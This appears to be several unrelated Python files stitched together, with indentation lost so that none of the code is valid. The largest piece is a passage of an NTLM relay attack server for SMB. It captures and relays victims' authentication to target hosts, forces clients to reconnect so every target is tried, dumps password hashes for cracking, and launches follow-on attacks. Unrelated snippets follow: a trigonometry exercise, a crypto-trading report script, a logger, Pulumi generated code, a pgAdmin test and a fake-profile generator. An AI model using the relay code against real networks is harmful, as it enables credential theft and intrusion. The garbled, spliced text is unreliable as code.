self.targetprocessor = TargetsProcessor (singleTarget='SMB://%s:445/' % connData['ClientIP'])
if self.authUser == '/':
LOG.info('SMBD-%s: Connection from %s authenticated as guest (anonymous). Skipping target selection.' %
(connId, connData['ClientIP']))
return self.origsmb2TreeConnect (connId, smbServer, recvPacket)
self.target = self.targetprocessor.getTarget(identity = self.authUser)
if self.target is None:
                # No more targets to process, just let the victim fail later
LOG.info('SMBD-%s: Connection from %s@%s controlled, but there are no more targets left!' %
(connId, self.authUser, connData['ClientIP']))
return self.origsmb2TreeConnect (connId, smbServer, recvPacket)
LOG.info('SMBD-%s: Connection from %s@%s controlled, attacking target %s://%s' % (connId, self.authUser,
connData['ClientIP'], self.target.scheme, self.target.netloc))
if self.config.mode.upper() == 'REFLECTION':
# Force standard security when doing reflection
LOG.debug("Downgrading to standard security")
extSec = False
#recvPacket['Flags2'] += (~smb.SMB.FLAGS2_EXTENDED_SECURITY)
else:
extSec = True
# Init the correct client for our target
client = self.init_client(extSec)
except Exception as e:
LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
self.targetprocessor.logTarget(self.target)
else:
connData['relayToHost'] = True
connData['Authenticated'] = False
del (connData['NEGOTIATE_MESSAGE'])
del (connData['CHALLENGE_MESSAGE'])
del (connData['AUTHENTICATE_MESSAGE'])
connData['SMBClient'] = client
connData['EncryptionKey'] = client.getStandardSecurityChallenge()
smbServer.setConnectionData(connId, connData)
respPacket = smb3.SMB2Packet()
respPacket['Flags'] = smb3.SMB2_FLAGS_SERVER_TO_REDIR
respPacket['Status'] = STATUS_SUCCESS
respPacket['CreditRequestResponse'] = 1
respPacket['Command'] = recvPacket['Command']
respPacket['SessionID'] = connData['Uid']
respPacket['Reserved'] = recvPacket['Reserved']
respPacket['MessageID'] = recvPacket['MessageID']
respPacket['TreeID'] = recvPacket['TreeID']
respSMBCommand = smb3.SMB2TreeConnect_Response()
# This is the key, force the client to reconnect.
# It will loop until all targets are processed for this user
errorCode = STATUS_NETWORK_SESSION_EXPIRED
respPacket['Status'] = errorCode
respSMBCommand['Capabilities'] = 0
respSMBCommand['MaximalAccess'] = 0x000f01ff
respPacket['Data'] = respSMBCommand
# Sign the packet if needed
if connData['SignatureEnabled']:
smbServer.signSMBv2(respPacket, connData['SigningSessionKey'])
smbServer.setConnectionData(connId, connData)
return None, [respPacket], errorCode
################################################################################
### SMBv1 Part #################################################################
def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
if (recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY) != 0:
if self.config.mode.upper() == 'REFLECTION':
# Force standard security when doing reflection
LOG.debug("Downgrading to standard security")
recvPacket['Flags2'] += (~smb.SMB.FLAGS2_EXTENDED_SECURITY)
return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)
#############################################################
def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
#############################################################
# SMBRelay
# Are we ready to relay or should we just do local auth?
if 'relayToHost' not in connData:
# Just call the original SessionSetup
return self.origSmbSessionSetupAndX(connId, smbServer, SMBCommand, recvPacket)
# We have confirmed we want to relay to the target host.
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
if connData['_dialects_parameters']['Capabilities'] & smb.SMB.CAP_EXTENDED_SECURITY:
# Extended security. Here we deal with all SPNEGO stuff
respParameters = smb.SMBSessionSetupAndX_Extended_Response_Parameters()
respData = smb.SMBSessionSetupAndX_Extended_Response_Data()
sessionSetupParameters = smb.SMBSessionSetupAndX_Extended_Parameters(SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
sessionSetupData.fromString(SMBCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
rawNTLM = False
if struct.unpack('B',sessionSetupData['SecurityBlob'][0:1])[0] != ASN1_AID:
                # If there is no GSSAPI ID, it must be an AUTH packet
blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = ntlm.NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
client = connData['SMBClient']
try:
challengeMessage = self.do_ntlm_negotiate(client,token)
except Exception:
# Log this target as processed for this client
self.targetprocessor.logTarget(self.target)
# Raise exception again to pass it on to the SMB server
raise
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegState'] = b'\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
                # Let's set up a UID for this connection and store it
                # in the connection's data
# Picking a fixed value
# TODO: Manage more UIDs for the same session
connData['Uid'] = 10
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
#############################################################
                # SMBRelay: Ok, so now that we have the Auth token, let's send it
# back to the target system and hope for the best.
client = connData['SMBClient']
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
#For some attacks it is important to know the authenticated username, so we store it
self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper()
clientResponse, errorCode = self.do_ntlm_auth(client,sessionSetupData['SecurityBlob'],
connData['CHALLENGE_MESSAGE']['challenge'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = smb.NewSMBPacket()
packet['Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
LOG.error("Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc, self.authUser))
#Log this target as processed for this client
self.targetprocessor.logTarget(self.target)
client.killConnection()
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
LOG.info("Authenticating against %s://%s as %s SUCCEED" % (self.target.scheme, self.target.netloc, self.authUser))
# Log this target as processed for this client
self.targetprocessor.logTarget(self.target, True, self.authUser)
ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
self.do_attack(client)
# Now continue with the server
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegState'] = b'\x00'
# Done with the relay for now.
connData['Authenticated'] = True
del(connData['relayToHost'])
# Status SUCCESS
errorCode = STATUS_SUCCESS
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
else:
# Process Standard Security
#TODO: Fix this for other protocols than SMB [!]
respParameters = smb.SMBSessionSetupAndXResponse_Parameters()
respData = smb.SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
sessionSetupData.fromString(SMBCommand['Data'])
client = connData['SMBClient']
_, errorCode = client.sendStandardSecurityAuth(sessionSetupData)
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = smb.NewSMBPacket()
packet['Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
#Log this target as processed for this client
self.targetprocessor.logTarget(self.target)
# Finish client's connection
#client.killConnection()
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
self.authUser = ('%s/%s' % (sessionSetupData['PrimaryDomain'], sessionSetupData['Account'])).upper()
LOG.info("Authenticating against %s://%s as %s SUCCEED" % (self.target.scheme, self.target.netloc, self.authUser))
# Log this target as processed for this client
self.targetprocessor.logTarget(self.target, True, self.authUser)
ntlm_hash_data = outputToJohnFormat('', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Done with the relay for now.
connData['Authenticated'] = True
del(connData['relayToHost'])
self.do_attack(client)
# Now continue with the server
#############################################################
respData['NativeOS'] = smbServer.getServerOS()
respData['NativeLanMan'] = smbServer.getServerOS()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
authenticateMessage = connData['AUTHENTICATE_MESSAGE']
self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode ('utf-16le'),
authenticateMessage['user_name'].decode ('utf-16le'))).upper ()
        # Uncommenting this will stop at the first relayed connection and won't relay again until all targets
        # are processed. There might be a use case for this
#if 'relayToHost' in connData:
# # Connection already relayed, let's just answer the request (that will return object not found)
        #    return self.origsmbComTreeConnectAndX(connId, smbServer, SMBCommand, recvPacket)
try:
if self.config.mode.upper () == 'REFLECTION':
self.targetprocessor = TargetsProcessor (singleTarget='SMB://%s:445/' % connData['ClientIP'])
if self.authUser == '/':
LOG.info('SMBD-%s: Connection from %s authenticated as guest (anonymous). Skipping target selection.' %
(connId, connData['ClientIP']))
return self.origsmbComTreeConnectAndX (connId, smbServer, recvPacket)
self.target = self.targetprocessor.getTarget(identity = self.authUser)
if self.target is None:
                # No more targets to process, just let the victim fail later
LOG.info('SMBD-%s: Connection from %s@%s controlled, but there are no more targets left!' %
(connId, self.authUser, connData['ClientIP']))
return self.origsmbComTreeConnectAndX (connId, smbServer, recvPacket)
LOG.info('SMBD-%s: Connection from %s@%s controlled, attacking target %s://%s' % ( connId, self.authUser,
connData['ClientIP'], self.target.scheme, self.target.netloc))
if self.config.mode.upper() == 'REFLECTION':
# Force standard security when doing reflection
LOG.debug("Downgrading to standard security")
extSec = False
recvPacket['Flags2'] += (~smb.SMB.FLAGS2_EXTENDED_SECURITY)
else:
extSec = True
# Init the correct client for our target
client = self.init_client(extSec)
except Exception as e:
LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
self.targetprocessor.logTarget(self.target)
else:
connData['relayToHost'] = True
connData['Authenticated'] = False
del (connData['NEGOTIATE_MESSAGE'])
del (connData['CHALLENGE_MESSAGE'])
del (connData['AUTHENTICATE_MESSAGE'])
connData['SMBClient'] = client
connData['EncryptionKey'] = client.getStandardSecurityChallenge()
smbServer.setConnectionData(connId, connData)
resp = smb.NewSMBPacket()
resp['Flags1'] = smb.SMB.FLAGS1_REPLY
resp['Flags2'] = smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES | \
recvPacket['Flags2'] & smb.SMB.FLAGS2_UNICODE
resp['Tid'] = recvPacket['Tid']
resp['Mid'] = recvPacket['Mid']
resp['Pid'] = connData['Pid']
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX)
respParameters = smb.SMBTreeConnectAndXResponse_Parameters()
respData = smb.SMBTreeConnectAndXResponse_Data()
treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters'])
if treeConnectAndXParameters['Flags'] & 0x8:
respParameters = smb.SMBTreeConnectAndXExtendedResponse_Parameters()
treeConnectAndXData = smb.SMBTreeConnectAndX_Data( flags = recvPacket['Flags2'] )
treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength']
treeConnectAndXData.fromString(SMBCommand['Data'])
## Process here the request, does the share exist?
UNCOrShare = decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Path'])
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
# This is the key, force the client to reconnect.
# It will loop until all targets are processed for this user
errorCode = STATUS_NETWORK_SESSION_EXPIRED
resp['ErrorCode'] = errorCode >> 16
resp['_reserved'] = 0o3
resp['ErrorClass'] = errorCode & 0xff
if path == 'IPC$':
respData['Service'] = 'IPC'
else:
respData['Service'] = path
respData['PadLen'] = 0
respData['NativeFileSystem'] = encodeSMBString(recvPacket['Flags2'], 'NTFS' )
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
resp['Uid'] = connData['Uid']
resp.addCommand(respSMBCommand)
smbServer.setConnectionData(connId, connData)
return None, [resp], errorCode
################################################################################
#Initialize the correct client for the relay target
def init_client(self,extSec):
if self.target.scheme.upper() in self.config.protocolClients:
client = self.config.protocolClients[self.target.scheme.upper()](self.config, self.target, extendedSecurity = extSec)
client.initConnection()
else:
raise Exception('Protocol Client for %s not found!' % self.target.scheme)
return client
def do_ntlm_negotiate(self,client,token):
#Since the clients all support the same operations there is no target protocol specific code needed for now
return client.sendNegotiate(token)
def do_ntlm_auth(self,client,SPNEGO_token,challenge):
#The NTLM blob is packed in a SPNEGO packet, extract it for methods other than SMB
clientResponse, errorCode = client.sendAuth(SPNEGO_token, challenge)
return clientResponse, errorCode
def do_attack(self,client):
#Do attack. Note that unlike the HTTP server, the config entries are stored in the current object and not in any of its properties
# Check if SOCKS is enabled and if we support the target scheme
if self.config.runSocks and self.target.scheme.upper() in self.config.socksServer.supportedSchemes:
if self.config.runSocks is True:
# Pass all the data to the socksplugins proxy
activeConnections.put((self.target.hostname, client.targetPort, self.target.scheme.upper(),
self.authUser, client, client.sessionData))
return
# If SOCKS is not enabled, or not supported for this scheme, fall back to "classic" attacks
if self.target.scheme.upper() in self.config.attacks:
# We have an attack.. go for it
clientThread = self.config.attacks[self.target.scheme.upper()](self.config, client.session, self.authUser)
clientThread.start()
else:
LOG.error('No attack configured for %s' % self.target.scheme.upper())
def _start(self):
self.server.daemon_threads=True
self.server.serve_forever()
LOG.info('Shutting down SMB Server')
self.server.server_close()
def run(self):
LOG.info("Setting up SMB Server")
self._start()
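# Minimal sketch (illustrative helper, not part of the original module):
# extracts the NTLMSSP message type exactly the way the handlers above do,
# so the messageType dispatch can be reasoned about in isolation.
def _ntlmssp_message_type(token):
    signature = b'NTLMSSP\x00'
    if token[:len(signature)] != signature:
        raise ValueError('not an NTLMSSP token')
    # little-endian uint32 right after the signature:
    # 1 = NEGOTIATE, 2 = CHALLENGE, 3 = AUTHENTICATE
    return struct.unpack('<L', token[len(signature):len(signature) + 4])[0]
# e.g. _ntlmssp_message_type(b'NTLMSSP\x00' + struct.pack('<L', 1)) == 1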
|
# Write a program that reads any angle and
# shows on screen the sine, cosine and tangent
# of that angle.
import math
angulo = float(input('Enter the desired angle: '))
seno = math.sin(math.radians(angulo))
cosseno = math.cos(math.radians(angulo))
tangente = math.tan(math.radians(angulo))
print('The angle {} has a SINE of {:.2f}'.format(angulo, seno))
print('The angle {} has a COSINE of {:.2f}'.format(angulo, cosseno))
print('The angle {} has a TANGENT of {:.2f}'.format(angulo, tangente))
|
'''
Database creation via peewee
'''
import peewee
db = peewee.SqliteDatabase('aceites.db')
class DB(peewee.Model):
class Meta:
database = db
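# Minimal sketch of how the base class above is typically used; the `Aceite`
# model and its fields are hypothetical, not taken from the original code.
class Aceite(DB):
    nombre = peewee.CharField()
    precio = peewee.FloatField()

db.connect()
db.create_tables([Aceite])
db.close()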
|
from huobi import RequestClient
from datetime import datetime
from huobi.model import *
import talib
import numpy as np
import matplotlib.pyplot as plt
from huobi.model.bararray import BarArray
from huobi.model.tradeinfoarray import TradeInfoArray
from huobi.impl.utils.emailsender import MyEmailContent
request_client = RequestClient()
dd = MyEmailContent()
# ########## 1 min data ############
candlestick_list_1 = request_client.get_candlestick("BTC_CQ", CandlestickInterval.MIN1, 100)
am_1 = BarArray()
am_1.update_candle(candlestick_list_1)
boll_1 = TradeInfoArray(1)
boll_1.update_boll_array(candlestick_list_1, am_1)
# ########## 5 min data ############
ttsi_5 = request_client.get_ttsi('BTC', '5min')
ttmu_5 = request_client.get_ttmu('BTC', '5min')
candlestick_list_5 = request_client.get_candlestick("BTC_CQ", CandlestickInterval.MIN5, 100)
am_5 = BarArray()
am_5.update_candle(candlestick_list_5)
boll_5 = TradeInfoArray(1)
boll_5.update_ttmu(ttmu_5)
boll_5.update_ttsi(ttsi_5)
boll_5.update_boll_array(candlestick_list_5, am_5)
# ########## 15 min data ############
ttsi_15 = request_client.get_ttsi('BTC', '15min')
ttmu_15 = request_client.get_ttmu('BTC', '15min')
candlestick_list_15 = request_client.get_candlestick("BTC_CQ", CandlestickInterval.MIN15, 100)
am_15 = BarArray()
am_15.update_candle(candlestick_list_15)
boll_15 = TradeInfoArray(1)
boll_15.update_ttmu(ttmu_15)
boll_15.update_ttsi(ttsi_15)
boll_15.update_boll_array(candlestick_list_15, am_15)
# ########## 30 min data ############
ttsi_30 = request_client.get_ttsi('BTC', '30min')
ttmu_30 = request_client.get_ttmu('BTC', '30min')
candlestick_list_30 = request_client.get_candlestick("BTC_CQ", CandlestickInterval.MIN30, 100)
am_30 = BarArray()
am_30.update_candle(candlestick_list_30)
boll_30 = TradeInfoArray(1)
boll_30.update_ttmu(ttmu_30)
boll_30.update_ttsi(ttsi_30)
boll_30.update_boll_array(candlestick_list_30, am_30)
# ########## 60 min data ############
ttsi_60 = request_client.get_ttsi('BTC', '60min')
ttmu_60 = request_client.get_ttmu('BTC', '60min')
pos_60 = request_client.get_position('BTC', 'quarter', '60min', '48', '1')
candlestick_list_60 = request_client.get_candlestick("BTC_CQ", CandlestickInterval.MIN60, 100)
am_60 = BarArray()
am_60.update_candle(candlestick_list_60)
boll_60 = TradeInfoArray(1)
boll_60.update_all(ttsi_60, ttmu_60, pos_60, candlestick_list_60, am_60)
# ########## 4 hours ############
ttsi_4h = request_client.get_ttsi('BTC', '4hour')
ttmu_4h = request_client.get_ttmu('BTC', '4hour')
pos_4h = request_client.get_position('BTC', 'quarter', '4hour', '48', '1')
candlestick_list_4h = request_client.get_candlestick("BTC_CQ", CandlestickInterval.HOUR4, 100)
am_4h = BarArray()
am_4h.update_candle(candlestick_list_4h)
boll_4h = TradeInfoArray(1)
boll_4h.update_all(ttsi_4h, ttmu_4h, pos_4h, candlestick_list_4h, am_4h)
# ########## 1 day data ############
ttsi_1d = request_client.get_ttsi('BTC', '1day')
ttmu_1d = request_client.get_ttmu('BTC', '1day')
pos_1d = request_client.get_position('BTC', 'quarter', '1day', '48', '1')
candlestick_list_1d = request_client.get_candlestick("BTC_CQ", CandlestickInterval.DAY1, 100)
am_1d = BarArray()
am_1d.update_candle(candlestick_list_1d)
boll_1d = TradeInfoArray(1)
boll_1d.update_all(ttsi_1d, ttmu_1d, pos_1d, candlestick_list_1d, am_1d)
# ####### generating report #######
dd.generate_report(am_1, boll_1, '1 min')
dd.generate_report(am_5, boll_5, '5 min')
dd.generate_report(am_15, boll_15, '15 min')
dd.generate_report(am_30, boll_30, '30 min')
dd.generate_report(am_60, boll_60, '60 min')
dd.generate_report(am_4h, boll_4h, '4 hours')
dd.generate_report(am_1d, boll_1d, '1d')
if dd.send_flag == 1:
dd.get_msg()
    dd.sendmail('Status report', dd.to_str())
# x = np.arange(80, 100)
# fig, ax1 = plt.subplots()
# ax2 = ax1.twinx()
# ax1.plot(x, boll_60.ttmu_buy_ratio[-20:], 'ro-', label="TTMU 1day")
# ax1.plot(x, boll_60.ttsi_buy_ratio[-20:], 'g+-', label="TTSI 1day")
# ax2.plot(x, boll_60.market_position[-20:], 'y+-', label="Position 1day")
# ax1.legend(loc=0)
# ax2.legend(loc=0)
# plt.title('RSI chart')
# plt.xlabel('Time')
# plt.ylabel('RSI')
# plt.legend()
# plt.show()
# plt.savefig("d:/cv/image_2.png")
# plt.close()
# dd.sendmail('Status report', dd.to_str())
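# Refactoring sketch (not part of the original flow): the per-interval blocks
# above repeat the same fetch/update sequence and could be collapsed into a
# helper. Only calls already used above are assumed here.
def build_trade_info(symbol, contract, interval_name, candle_interval, with_position=False):
    ttsi = request_client.get_ttsi(symbol, interval_name)
    ttmu = request_client.get_ttmu(symbol, interval_name)
    candles = request_client.get_candlestick(contract, candle_interval, 100)
    bars = BarArray()
    bars.update_candle(candles)
    info = TradeInfoArray(1)
    if with_position:
        # Longer intervals also fold in open-position data via update_all().
        pos = request_client.get_position(symbol, 'quarter', interval_name, '48', '1')
        info.update_all(ttsi, ttmu, pos, candles, bars)
    else:
        info.update_ttmu(ttmu)
        info.update_ttsi(ttsi)
        info.update_boll_array(candles, bars)
    return bars, info
# Example: am_60, boll_60 = build_trade_info('BTC', 'BTC_CQ', '60min', CandlestickInterval.MIN60, with_position=True)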
|
__all__ = ["time_rule", "quant_quest_time_rule", "us_time_rule", "nse_time_rule", "custom_time_rule"]
|
import logging
from logging.handlers import RotatingFileHandler
FALLBACK_FORMAT = '%(asctime)s [%(levelname)s] %(process)d#%(thread)d: %(name)s - %(message)s'
def init_logger(app, logger):
level = getattr(logging, app.config['LOG_LEVEL'].upper())
file_name = app.config['LOG_FILE_NAME']
max_bytes = app.config['LOG_FILE_MAX_SIZE']
backup_count = app.config['LOG_FILE_BACKUP_COUNT']
    logger.setLevel(level)
    try:
        handler = RotatingFileHandler(file_name, maxBytes=max_bytes, backupCount=backup_count)
    except Exception:
        # Fall back to stderr if the log file cannot be opened.
        handler = logging.StreamHandler()
formatter = logging.Formatter(FALLBACK_FORMAT)
handler.setFormatter(formatter)
handler.setLevel(level)
logger.addHandler(handler)
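# Usage sketch (hypothetical app object; any object whose `config` mapping
# holds these keys works, e.g. a Flask app):
if __name__ == '__main__':
    class _App:
        config = {
            'LOG_LEVEL': 'info',
            'LOG_FILE_NAME': 'app.log',
            'LOG_FILE_MAX_SIZE': 10 * 1024 * 1024,
            'LOG_FILE_BACKUP_COUNT': 3,
        }
    demo_logger = logging.getLogger('demo')
    init_logger(_App(), demo_logger)
    demo_logger.info('logger initialized')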
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
# Export this package's modules as members:
from ._enums import *
from .get_guest_configuration_assignment import *
from .get_guest_configuration_hcrpassignment import *
from .guest_configuration_assignment import *
from .guest_configuration_hcrpassignment import *
from ._inputs import *
from . import outputs
def _register_module():
import pulumi
from ... import _utilities
class Module(pulumi.runtime.ResourceModule):
_version = _utilities.get_semver_version()
def version(self):
return Module._version
def construct(self, name: str, typ: str, urn: str) -> pulumi.Resource:
if typ == "azure-native:guestconfiguration/latest:GuestConfigurationAssignment":
return GuestConfigurationAssignment(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:guestconfiguration/latest:GuestConfigurationHCRPAssignment":
return GuestConfigurationHCRPAssignment(name, pulumi.ResourceOptions(urn=urn))
else:
raise Exception(f"unknown resource type {typ}")
_module_instance = Module()
pulumi.runtime.register_resource_module("azure-native", "guestconfiguration/latest", _module_instance)
_register_module()
|
"""
Define a function that can accept two strings as input and concatenate them and then print it in console.
"""
"""Question:
Define a function that can accept two strings as input and concatenate them and then print it in console.
Hints:
Use + to concatenate the strings
"""
def printValue(s1, s2):
    print(s1 + s2)
printValue("3", "4")  # 34
|
##########################################################################
#
# pgAdmin 4 - PostgreSQL Tools
#
# Copyright (C) 2013 - 2020, The pgAdmin Development Team
# This software is released under the PostgreSQL Licence
#
##########################################################################
from __future__ import print_function
import json
import uuid
from pgadmin.browser.server_groups.servers.databases.schemas.tests import \
utils as schema_utils
from pgadmin.browser.server_groups.servers.databases.tests import \
utils as database_utils
from pgadmin.utils.route import BaseTestGenerator
from regression import parent_node_dict
from regression.python_test_utils import test_utils as utils
from . import utils as fts_temp_utils
class FtsTemplateAddTestCase(BaseTestGenerator):
""" This class will add new FTS template under test schema. """
scenarios = [
# Fetching default URL for FTS template node.
(
'Fetch FTS templates Node URL',
dict(url='/browser/fts_template/obj/'))
]
def runTest(self):
""" This function will add FTS template present under
test schema. """
self.schema_data = parent_node_dict['schema'][-1]
self.schema_name = self.schema_data['schema_name']
self.schema_id = self.schema_data['schema_id']
self.server_id = self.schema_data['server_id']
self.db_id = self.schema_data['db_id']
self.db_name = parent_node_dict["database"][-1]["db_name"]
db_con = database_utils.connect_database(self,
utils.SERVER_GROUP,
self.server_id,
self.db_id)
if not db_con["info"] == "Database connected.":
raise Exception("Could not connect to database.")
schema_response = schema_utils.verify_schemas(self.server,
self.db_name,
self.schema_name)
if not schema_response:
raise Exception("Could not find the schema.")
self.fts_template_name = "fts_temp_%s" % str(uuid.uuid4())[1:8]
self.data = \
{
"name": self.fts_template_name,
"schema": self.schema_id,
"tmplinit": "dispell_init",
"tmpllexize": "dispell_lexize"
}
response = self.tester.post(
self.url + str(utils.SERVER_GROUP) + '/' +
str(self.server_id) + '/' + str(self.db_id) +
'/' + str(self.schema_id) + '/',
data=json.dumps(self.data),
content_type='html/json')
        self.assertEqual(response.status_code, 200)
def tearDown(self):
"""This function delete the fts_template and disconnect the test
database."""
fts_temp_utils.delete_fts_template(self.server, self.db_name,
self.schema_name,
self.fts_template_name)
database_utils.disconnect_database(self, self.server_id,
self.db_id)
|
# -*- coding: utf-8 -*-
import os
import numpy as np
import rstr
from dfa import DFA
def gen_dataset(fname):
with open(os.path.expanduser(fname), 'r') as f:
str_dataset = f.read()
dict_dataset = {}
cur_id = '0'
fl = []
for r in str_dataset.split('\n'):
if r == '':
dict_dataset[cur_id] = fl
break
id, fr = r.split(' ')
if id == cur_id:
fl.append(fr)
else:
dict_dataset[cur_id] = fl
fl = [fr]
cur_id = id
return dict_dataset
def gen_fake(n_total=4039, n_genuines=1399):
total = np.arange(n_total)
genuines = np.random.choice(total, size=n_genuines, replace=False)
fakes = total[np.in1d(total, genuines, invert=True)]
return genuines, fakes
def friend_pattern(px_friend_list, genuine_ix):
new_friend_list = []
    n_genuines = []
    n_fakes = []
genuine_fp = '(a|b)*a#' # Facebook FP
fake_fp = '(a*|b)(b|ab*a)#'
for i, inst in enumerate(px_friend_list):
if int(inst) in genuine_ix:
fp_to_use = genuine_fp
# n_genuines += 1
n_genuines.append('genuine')
else:
fp_to_use = fake_fp
# n_fakes += 1
n_fakes.append('fake')
while True:
fp = rstr.xeger(fp_to_use)
if fp not in new_friend_list:
break
new_friend_list.append(fp)
return new_friend_list, n_genuines, n_fakes
class FacebookIPR(object):
def __init__(self, ):
""""""
ipr = DFA(alphabet=['a', 'b', '#'])
# States
ipr.add_state(initial=True) # q_0
ipr.add_state() # q_1
ipr.add_state() # q_2
ipr.add_state(accept=True) # q_3
# Transitions
ipr.add_transition('q_0', 'q_1', 'a')
ipr.add_transition('q_0', 'q_1', 'b')
ipr.add_transition('q_1', 'q_2', 'a')
ipr.add_transition('q_1', 'q_1', 'b')
ipr.add_transition('q_2', 'q_2', 'a')
ipr.add_transition('q_2', 'q_1', 'b')
ipr.add_transition('q_2', 'q_3', '#')
self.dfa = ipr
def check_profile(self, profile):
return self.dfa.process_sequence(profile, verbose=False)
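    # Illustrative behavior (assuming process_sequence returns True iff the
    # DFA ends in an accepting state):
    #   FacebookIPR().check_profile('ba#')  -> True   (reaches q_3)
    #   FacebookIPR().check_profile('ab#')  -> False  (no '#' move from q_1)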
if __name__ == '__main__':
fname = '~/Downloads/facebook_combined.txt'
fb_ipr = FacebookIPR()
ds = gen_dataset(fname)
